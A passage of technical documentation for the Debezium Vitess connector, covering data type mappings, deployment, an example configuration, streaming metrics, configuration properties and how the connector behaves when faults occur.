BOOL`\n|`INT16`\na|_n\/a_\n\n|`BIT(1)`\n|Not yet supported\na|_n\/a_\n\n|`BIT(>1)`\n|Not yet supported\na|_n\/a_\n\n|`TINYINT`\n|`INT16`\na|_n\/a_\n\n|`SMALLINT[(M)]`\n|`INT16`\na|_n\/a_\n\n|`MEDIUMINT[(M)]`\n|`INT32`\na|_n\/a_\n\n|`INT, INTEGER[(M)]`\n|`INT32`\na|_n\/a_\n\n|`BIGINT[(M)]`\n|`INT64`\na|_n\/a_\n\n|`REAL[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`CHAR[(M)]`\n|`STRING`\na|_n\/a_\n\n|`VARCHAR[(M)]`\n|`STRING`\na|_n\/a_\n\n|`BINARY[(M)]`\n|`BYTES`\na|_n\/a_\n\n|`VARBINARY[(M)]`\n|`BYTES`\na|_n\/a_\n\n|`TINYBLOB`\n|`BYTES`\na|_n\/a_\n\n|`TINYTEXT`\n|`STRING`\na|_n\/a_\n\n|`BLOB`\n|`BYTES`\na|_n\/a_\n\n|`TEXT`\n|`STRING`\na|_n\/a_\n\n|`MEDIUMBLOB`\n|`BYTES`\na|_n\/a_\n\n|`MEDIUMTEXT`\n|`STRING`\na|_n\/a_\n\n|`LONGBLOB`\n|`BYTES`\na|_n\/a_\n\n|`LONGTEXT`\n|`STRING`\na|_n\/a_\n\n|`JSON`\n|`STRING`\na|`io.debezium.data.Json` +\nContains the string representation of a `JSON` document, array, or scalar.\n\n|`ENUM`\n|`STRING`\na|`io.debezium.data.Enum` +\nThe `allowed` schema parameter contains the comma-separated list of allowed 
values.\n\n|`SET`\n|`STRING`\na|`io.debezium.data.EnumSet` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`YEAR[(2\|4)]`\n|`STRING`\n|_n\/a_\n\n|`TIMESTAMP[(M)]`\n|`STRING`\na|_n\/a_ +\nIn `yyyy-MM-dd HH:mm:ss.SSS` format with microsecond precision based on UTC. MySQL allows `M` to be in the range of `0-6`.\n\n|`DATETIME[(M)]`\n|`STRING`\na|_n\/a_ +\nIn `yyyy-MM-dd HH:mm:ss.SSS` format with microsecond precision. MySQL allows `M` to be in the range of `0-6`.\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`GEOMETRY, +\nLINESTRING, +\nPOLYGON, +\nMULTIPOINT, +\nMULTILINESTRING, +\nMULTIPOLYGON, +\nGEOMETRYCOLLECTION`\n|Not yet supported\na|_n\/a_\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-vitess-to-run-a-debezium-connector\n\/\/ Title: Setting up Vitess to run a {prodname} connector\n[[setting-up-vitess]]\n== Setting up Vitess\n\n{prodname} does not require any specific configuration for use with Vitess. Install Vitess according to the standard instructions in the link:https:\/\/vitess.io\/docs\/get-started\/local-docker\/[Local Install via Docker] guide, or the link:https:\/\/vitess.io\/docs\/get-started\/operator\/[Vitess Operator for Kubernetes] guide.\n\n.Checklist\n\n* Make sure that the VTGate host and its gRPC port (default is 15991) are accessible from the machine where the Vitess connector is installed\n* Make sure that the VTCtld host and its gRPC port (default is 15999) are accessible from the machine where the Vitess connector is installed\n\n\/\/ Type: procedure\n\/\/ ModuleID: grpc-authentication\n\/\/ Title: gRPC authentication for a {prodname} connector\n[[grpc-authentication]]\n=== gRPC authentication\n\nBecause the Vitess connector reads change events from the VTGate VStream gRPC server, it does not need to connect directly to MySQL instances. Therefore, no special database user or permissions are needed. At the moment, the Vitess connector supports only unauthenticated access to the VTGate gRPC server.\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-and-managing-debezium-vitess-connectors\n\/\/ Title: Deploying and managing {prodname} Vitess connectors\n[[vitess-deploying-a-connector]]\n== Deployment\n\nWith link:https:\/\/zookeeper.apache.org[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Vitess connector are to download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-vitess\/{debezium-version}\/debezium-connector-vitess-{debezium-version}-plugin.tar.gz[connector's plug-in archive], extract the JAR files into your Kafka Connect environment, and add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`]. You then need to restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Vitess connector already installed and ready to run. 
You can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-vitess-connector-configuration-example\n\/\/ Title: {prodname} Vitess connector configuration example\n[[vitess-example-configuration]]\n=== Connector configuration example\n\nFollowing is an example of the configuration for a Vitess connector that connects to a Vitess (VTGate's VStream) server on port 15991 at 192.168.99.100, whose logical name is `fulfillment`. It also connects to a VTCtld server on port 15999 at 192.168.99.101 to get the initial VGTID. Typically, you configure the {prodname} Vitess connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.vitess.VitessConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"15991\", \/\/ <4>\n \"database.user\": \"vitess\", \/\/ <5>\n \"database.password\": \"vitess_password\", \/\/ <6>\n \"vitess.keyspace\": \"commerce\", \/\/ <7>\n \"vitess.tablet.type\": \"MASTER\", \/\/ <8>\n \"vitess.vtctld.host\": \"192.168.99.101\", \/\/ <9>\n \"vitess.vtctld.port\": \"15999\", \/\/ <10>\n \"vitess.vtctld.user\": \"vitess\", \/\/ <11>\n \"vitess.vtctld.password\": \"vitess_password\", \/\/ <12>\n \"database.server.name\": \"fulfillment\", \/\/ <13>\n \"tasks.max\": 1 \/\/ <14>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Vitess connector class.\n<3> The address of the Vitess (VTGate's VStream) server.\n<4> The port number of the Vitess (VTGate's VStream) server.\n<5> The username of the Vitess database server (VTGate gRPC).\n<6> The password of the Vitess database server (VTGate gRPC).\n<7> The name of the keyspace (a.k.a. database). Because no shard is specified, it reads change events from all shards in the keyspace.\n<8> The type of MySQL instance (MASTER or REPLICA) to read change events from.\n<9> The address of the VTCtld server.\n<10> The port of the VTCtld server.\n<11> The username of the VTCtld server (VTCtld gRPC).\n<12> The password of the VTCtld database server (VTCtld gRPC).\n<13> The logical name of the Vitess cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<14> Only one task should operate at any one time.\n\nSee the xref:vitess-connector-properties[complete list of Vitess connector properties] that can be specified in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. 
The service records the configuration and starts the connector task that connects to the Vitess database and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-vitess-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Vitess connector configuration to Kafka Connect\n[[vitess-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a Vitess connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* The VTGate host and its gRPC port (default is 15991) are accessible from the machine where the Vitess connector is installed\n\n* The VTCtld host and its gRPC port (default is 15999) are accessible from the machine where the Vitess connector is installed\n\n* The Vitess connector is installed.\n\n.Procedure\n\n. Create a configuration for the Vitess connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\n.Results\n\nWhen the connector starts, it starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-vitess-connector-performance\n\/\/ Title: Monitoring {prodname} Vitess connector performance\n[[vitess-monitoring]]\n=== Monitoring\n\nThe {prodname} Vitess connector provides one type of metrics in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* xref:vitess-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\nxref:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-vitess-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Vitess connector record streaming\n[[vitess-streaming-metrics]]\n==== Streaming metrics\n\nThe *MBean* is `debezium.vitess:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\n[cols=\"45%a,25%a,30%a\",options=\"header\"]\n|===\n|Attributes |Type |Description\n\n|[[connectors-strm-metric-millisecondssincelastevent]]<<connectors-strm-metric-millisecondssincelastevent, `+MilliSecondsSinceLastEvent+`>>\n|`long`\n|The number of milliseconds since the connector has read and processed the most recent event.\n\n|[[connectors-strm-metric-totalnumberofeventsseen]]<<connectors-strm-metric-totalnumberofeventsseen, `+TotalNumberOfEventsSeen+`>>\n|`long`\n|The total number of events that this connector has seen since last started or reset.\n\n|[[connectors-strm-metric-numberofeventsfiltered]]<<connectors-strm-metric-numberofeventsfiltered, `+NumberOfEventsFiltered+`>>\n|`long`\n|The number of events that have been filtered by include\/exclude list filtering rules configured on the connector.\n\n|[[connectors-strm-metric-queuetotalcapacity]]<<connectors-strm-metric-queuetotalcapacity, `+QueueTotalCapacity+`>>\n|`int`\n|The length of the queue used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-queueremainingcapacity]]<<connectors-strm-metric-queueremainingcapacity, `+QueueRemainingCapacity+`>>\n|`int`\n|The free capacity of the queue used to pass events between the streamer and the main Kafka Connect 
loop.\n\n|[[connectors-strm-metric-connected]]<<connectors-strm-metric-connected, `+Connected+`>>\n|`boolean`\n|Flag that denotes whether the connector is currently connected to the database server.\n\n|[[connectors-strm-metric-millisecondsbehindsource]]<<connectors-strm-metric-millisecondsbehindsource, `+MilliSecondsBehindSource+`>>\n|`long`\n|The number of milliseconds between the last change event's timestamp and the connector processing it.\nThe values will incorporate any differences between the clocks on the machines where the database server and the connector are running.\n\n|[[connectors-strm-metric-numberofcommittedtransactions]]<<connectors-strm-metric-numberofcommittedtransactions, `+NumberOfCommittedTransactions+`>>\n|`long`\n|The number of processed transactions that were committed.\n\n|[[connectors-strm-metric-maxqueuesizeinbytes]]<<connectors-strm-metric-maxqueuesizeinbytes, `+MaxQueueSizeInBytes+`>>\n|`long`\n|The maximum buffer size of the queue in bytes used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-currentqueuesizeinbytes]]<<connectors-strm-metric-currentqueuesizeinbytes, `+CurrentQueueSizeInBytes+`>>\n|`long`\n|The current buffer size of the queue in bytes used to pass events between the streamer and the main Kafka Connect loop.\n\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-vitess-connector-configuration-properties\n\/\/ Title: Description of {prodname} Vitess connector configuration properties\n[[vitess-connector-properties]]\n=== Connector configuration properties\n\nThe {prodname} Vitess connector has many configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:vitess-required-configuration-properties[Required configuration properties]\n* xref:vitess-advanced-configuration-properties[Advanced configuration properties]\n* xref:vitess-pass-through-properties[Pass-through configuration properties]\n\n[id=\"vitess-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[vitess-property-name]]<<vitess-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[vitess-property-connector-class]]<<vitess-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.vitess.VitessConnector` for the Vitess connector.\n\n|[[vitess-property-tasks-max]]<<vitess-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. 
The Vitess connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[vitess-property-database-hostname]]<<vitess-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the Vitess database server (VTGate).\n\n|[[vitess-property-database-port]]<<vitess-property-database-port, `+database.port+`>>\n|`15991`\n|Integer port number of the Vitess database server (VTGate).\n\n|[[vitess-property-keyspace]]<<vitess-property-keyspace, `+vitess.keyspace+`>>\n|\n|The name of the keyspace from which to stream the changes.\n\n|[[vitess-property-shard]]<<vitess-property-shard, `+vitess.shard+`>>\n|_n\/a_\n|An optional name of the shard from which to stream the changes. If not configured, the connector streams changes from the only shard of an unsharded keyspace, or from all shards of a sharded keyspace. We recommend leaving this property unset so that the connector streams from all shards in the keyspace, because doing so provides better support for reshard operations. If the property is set to, for example, `-80`, the connector streams changes only from the `-80` shard.\n\n|[[vitess-property-gtid]]<<vitess-property-gtid, `+vitess.gtid+`>>\n|`current`\n|An optional GTID position for a shard to stream from. This property must be set together with `vitess.shard`. If not configured, the connector streams changes from the latest position for the given shard.\n\n|[[vitess-property-stop-on-reshard]]<<vitess-property-stop-on-reshard, `+vitess.stop_on_reshard+`>>\n|`false`\n|Controls the Vitess `stop_on_reshard` flag. +\n +\n`true` - the stream will be stopped after a reshard operation. +\n +\n`false` - the stream will be automatically migrated for the new shards after a reshard operation. +\n +\nIf set to `true`, you should also consider setting `vitess.gtid` in the configuration.\n\n|[[vitess-property-database-user]]<<vitess-property-database-user, `+vitess.database.user+`>>\n|_n\/a_\n|An optional username of the Vitess database server (VTGate). If not configured, unauthenticated VTGate gRPC is used.\n\n|[[vitess-property-database-password]]<<vitess-property-database-password, `+vitess.database.password+`>>\n|_n\/a_\n|An optional password of the Vitess database server (VTGate). 
If not configured, unauthenticated VTGate gRPC is used.\n\n|[[vitess-property-tablet-type]]<<vitess-property-tablet-type, `+vitess.tablet.type+`>>\n|`MASTER`\n|The type of tablet (and hence the MySQL instance) from which to stream the changes: +\n +\n`MASTER` represents streaming from the master MySQL instance +\n +\n`REPLICA` represents streaming from the replica slave MySQL instance +\n +\n`RDONLY` represents streaming from the read-only slave MySQL instance.\n\n|[[vitess-property-database-server-name]]<<vitess-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular Vitess database server or cluster in which {prodname} is capturing changes.\nOnly alphanumeric characters, hyphens, dots and underscores must be used in the database server logical name.\nThe logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n+\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\n====\n\n|[[vitess-property-table-include-list]]<<vitess-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want to capture. Any table not included in `table.include.list` does not have its changes captured. Each identifier is of the form _keyspace_._tableName_. By default, the connector captures changes in every non-system table in each schema whose changes are being captured. Do not also set the `table.exclude.list` property.\n\n|[[vitess-property-table-exclude.list]]<<vitess-property-table-exclude.list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you *do not* want to capture. Any table not included in `table.exclude.list` has its changes captured. Each identifier is of the form _keyspace_._tableName_. Do not also set the `table.include.list` property.\n\n|[[vitess-property-column-include-list]]<<vitess-property-column-include-list, `+column.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in change event record values. Fully-qualified names for columns are of the form _keyspace_._tableName_._columnName_. Do not also set the `column.exclude.list` property.\n\n|[[vitess-property-column-exclude-list]]<<vitess-property-column-exclude-list, `+column.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event record values. Fully-qualified names for columns are of the form _keyspace_._tableName_._columnName_. Do not also set the `column.include.list` property.\n\n|[[vitess-property-tombstones-on-delete]]<<vitess-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. 
+\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[vitess-property-message-key-columns]]<<vitess-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon-separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_keyspace-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`keyspaceA.table_a:regex_1;keyspaceA.table_b:regex_2;keyspaceA.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n|===\n\n
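Putting the required properties together, a minimal connector registration might look as follows. This is a sketch only: the connector name, hostname, keyspace, and logical server name are placeholder values, and any property that is not listed falls back to the defaults described above.\n\n[source,json]\n----\n{\n  \"name\": \"vitess-connector\",\n  \"config\": {\n    \"connector.class\": \"io.debezium.connector.vitess.VitessConnector\",\n    \"tasks.max\": \"1\",\n    \"database.hostname\": \"vtgate-host\",\n    \"database.port\": \"15991\",\n    \"vitess.keyspace\": \"commerce\",\n    \"database.server.name\": \"dbserver1\"\n  }\n}\n----\n\nA payload like this is typically submitted to the Kafka Connect REST API, for example by POSTing it to the `\/connectors` endpoint.\n\n[id=\"vitess-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,28%a,42%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[vitess-property-event-processing-failure-handling-mode]]<<vitess-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n| Specifies how the connector should react to exceptions during processing of events: +\n +\n`fail` propagates the exception, indicates the offset of the problematic event, and causes the connector to stop. +\n +\n`warn` logs the offset of the problematic event, skips that event, and continues processing. 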
+\n +\n`skip` skips the problematic event and continues processing.\n\n|[[vitess-property-max-queue-size]]<<vitess-property-max-queue-size, `+max.queue.size+`>>\n|`20240`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].\n\n|[[vitess-property-max-batch-size]]<<vitess-property-max-batch-size, `+max.batch.size+`>>\n|`10240`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[vitess-property-max-queue-size-in-bytes]]<<vitess-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:vitess-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[vitess-property-poll-interval-ms]]<<vitess-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[vitess-property-sanitize-field-names]]<<vitess-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter. +\n`false` if not.\n|Indicates whether field names are sanitized to adhere to xref:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[vitess-property-skipped-operations]]<<vitess-property-skipped-operations, `+skipped.operations+`>>\n|\n|A comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, and `d` for deletes.\nBy default, no operations are skipped.\n\n|[[vitess-property-provide-transaction-metadata]]<<vitess-property-provide-transaction-metadata, `provide.transaction.metadata`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See xref:vitess-transaction-metadata[Transaction metadata] for details.\n\n|[[vitess-property-transaction-topic]]<<vitess-property-transaction-topic, `transaction.topic`>>\n|`${database.server.name}.transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. 
The placeholder `${database.server.name}` can be used for referring to the connector's logical name; defaults to `${database.server.name}.transaction`, for example `dbserver1.transaction`.\n\n|[[vitess-property-keepalive-interval-ms]]<<vitess-property-keepalive-interval-ms, `+vitess.keepalive.interval.ms+`>>\n|`Long.MAX_VALUE`\n|Controls the interval between periodic gRPC keepalive pings for VStream. Defaults to `Long.MAX_VALUE` (disabled).\n\n|[[vitess-property-grpc-headers]]<<vitess-property-grpc-headers, `+vitess.grpc.headers+`>>\n|\n|Specify a comma-separated list of gRPC headers. Defaults to empty. The format is: +\n +\n_key1:value1,key2:value2_,... +\n +\nFor example, +\n +\n`x-envoy-upstream-rq-timeout-ms:0,x-envoy-max-retries:2`\n\n|[[vitess-property-column-propagate-source-type]]<<vitess-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters:\n\n`pass:[_]pass:[_]debezium.source.column.type`\n\nare used to propagate the original type name and length for variable-width types. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of the following form:\n\n_keyspaceName_._tableName_._columnName_\n\n|[[vitess-property-datatype-propagate-source-type]]<<vitess-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the database-specific data type name of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters:\n\n`pass:[_]pass:[_]debezium.source.column.type`\n\nare used to propagate the original type name and length for variable-width types. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of the following form:\n\n_keyspaceName_._tableName_._columnName_\n\nSee xref:vitess-data-types[how Vitess connectors map data types] for the list of Vitess-specific data type names.\n\n\n|===\n\n[id=\"vitess-pass-through-properties\"]\n.Pass-through connector configuration properties\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer.\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. The Vitess connector does use the {link-kafka-docs}.html#consumerconfigs[new consumer configuration properties].\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-vitess-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} Vitess connectors handle faults and problems\n[[vitess-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully, {prodname} provides _exactly once_ delivery of every change event record.\n\nIf a fault does happen, the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. 
In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\n\n[id=\"vitess-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error\/exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to Vitess by using the specified connection parameters.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the Vitess problem, restart the connector.\n\n[id=\"vitess-becomes-unavailable\"]\n=== Vitess becomes unavailable\n\nWhen the connector is running, the Vitess server (VTGate) that it is connected to could become unavailable for any number of reasons. If this happens, the connector fails with an error and stops. When the server is available again, restart the connector.\n\nThe Vitess connector externally stores the last processed offset in the form of a Vitess VGTID. After a connector restarts and connects to a server instance, the connector communicates with the server to continue streaming from that particular offset.\n\n[id=\"invalid-column-name-error\"]\n=== Invalid column name error\n\nThis error happens very rarely. If you receive an error with the message `Illegal prefix '@' for column: x, from schema: y, table: z`, and your table doesn't have such a column, it is a Vitess vstream link:https:\/\/vitess.slack.com\/archives\/C0PQY0PTK\/p1606817216038500[bug] that is caused by a column rename or a column type change. It is a transient error. You can restart the connector after a short backoff and it should resolve automatically.\n\n[id=\"vitess-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nSuppose that Kafka Connect is being run in distributed mode and a Kafka Connect process is stopped gracefully. Prior to shutting down that process, Kafka Connect migrates the process's connector tasks to another Kafka Connect process in that group. The new connector tasks start processing exactly where the prior tasks stopped. There is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n[id=\"vitess-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf a Kafka Connect process stops unexpectedly, any connector tasks it was running terminate without recording their most recently processed offsets. When Kafka Connect is being run in distributed mode, Kafka Connect restarts those connector tasks on other processes. However, Vitess connectors resume from the last offset that was _recorded_ by the earlier processes. This means that the new replacement tasks might generate some of the same change events that were processed just prior to the crash. The number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\nBecause there is a chance that some events might be duplicated during a recovery from failure, consumers should always anticipate some duplicate events. 
{prodname} changes are idempotent, so a sequence of events always results in the same state.\n\nIn each change event record, {prodname} connectors insert source-specific information about the origin of the event, including the Vitess server's time of the event and the position in the binlog where the transaction changes were written. Consumers can keep track of this information, especially the VGTID, to determine whether an event is a duplicate.\n\n
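As an illustration of that idea (not production code), the following sketch uses the third-party `kafkajs` client and assumes that the change event's `source` block exposes the VGTID; the broker address, topic name, and in-memory `seen` store are placeholders.\n\n[source,javascript]\n----\nconst { Kafka } = require('kafkajs');\n\nconst kafka = new Kafka({ brokers: ['localhost:9092'] }); \/\/ placeholder broker\nconst consumer = kafka.consumer({ groupId: 'vitess-dedup-example' });\nconst seen = new Set(); \/\/ placeholder store; a real consumer would persist this\n\nasync function run() {\n  await consumer.connect();\n  await consumer.subscribe({ topic: 'dbserver1.commerce.customers' }); \/\/ placeholder topic\n  await consumer.run({\n    eachMessage: async ({ message }) => {\n      if (!message.value) {\n        return; \/\/ tombstone events have no value\n      }\n      const event = JSON.parse(message.value.toString());\n      const source = event.payload && event.payload.source;\n      const vgtid = source && source.vgtid;\n      if (!vgtid) {\n        return;\n      }\n      \/\/ Events of one transaction share a VGTID, so combine it with the\n      \/\/ record key to identify a single row change.\n      const dedupKey = vgtid + '|' + (message.key ? message.key.toString() : '');\n      if (seen.has(dedupKey)) {\n        return; \/\/ duplicate redelivered after a crash recovery, skip it\n      }\n      seen.add(dedupKey);\n      \/\/ ...apply the change idempotently here...\n    },\n  });\n}\n\nrun();\n----\n\n[id=\"vitess-kafka-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka by using the Kafka producer API. Periodically, at a frequency that you specify in the Kafka Connect configuration, Kafka Connect records the latest offset that appears in those change events. If the Kafka brokers become unavailable, the Kafka Connect process that is running the connectors repeatedly tries to reconnect to the Kafka brokers. In other words, the connector tasks pause until a connection can be re-established, at which point the connectors resume exactly where they left off.\n\n[id=\"vitess-connector-is-stopped-for-a-duration\"]\n=== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used. Any changes are recorded in the Vitess binlog. When the connector restarts, it resumes streaming changes where it left off. That is, it generates change event records for all database changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to handle massive throughput. Kafka Connect is written according to Kafka best practices, and given enough resources a Kafka Connect connector can also handle very large numbers of database change events. Because of this, after being stopped for a while, when a {prodname} connector restarts, it is very likely to catch up with the database changes that were made while it was stopped. How quickly this happens depends on the capabilities and performance of Kafka and the volume of changes being made to the data in Vitess.\n\n[id=\"limitations-with-earlier-vitess-versions\"]\n=== Limitations with earlier Vitess versions\n\n.Vitess 8.0.0\n\n* Due to a minor Vitess padding issue (which is fixed in Vitess 9.0.0), decimal values with a precision that is greater than or equal to 13 will cause extra whitespace in front of the number. E.g. if the column type is `decimal(13,4)` in the table definition, the value `-1.2300` becomes `\"- 1.2300\"`, and the value `1.2300` becomes `\" 1.2300\"`.\n* Does not support the `JSON` column type.\n* VStream 8.0.0 doesn't provide additional metadata of permitted values for `ENUM` columns.\nTherefore, the connector does not support the `ENUM` column type.\nThe index number (1-based) will be emitted instead of the enumeration value.\nE.g. 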
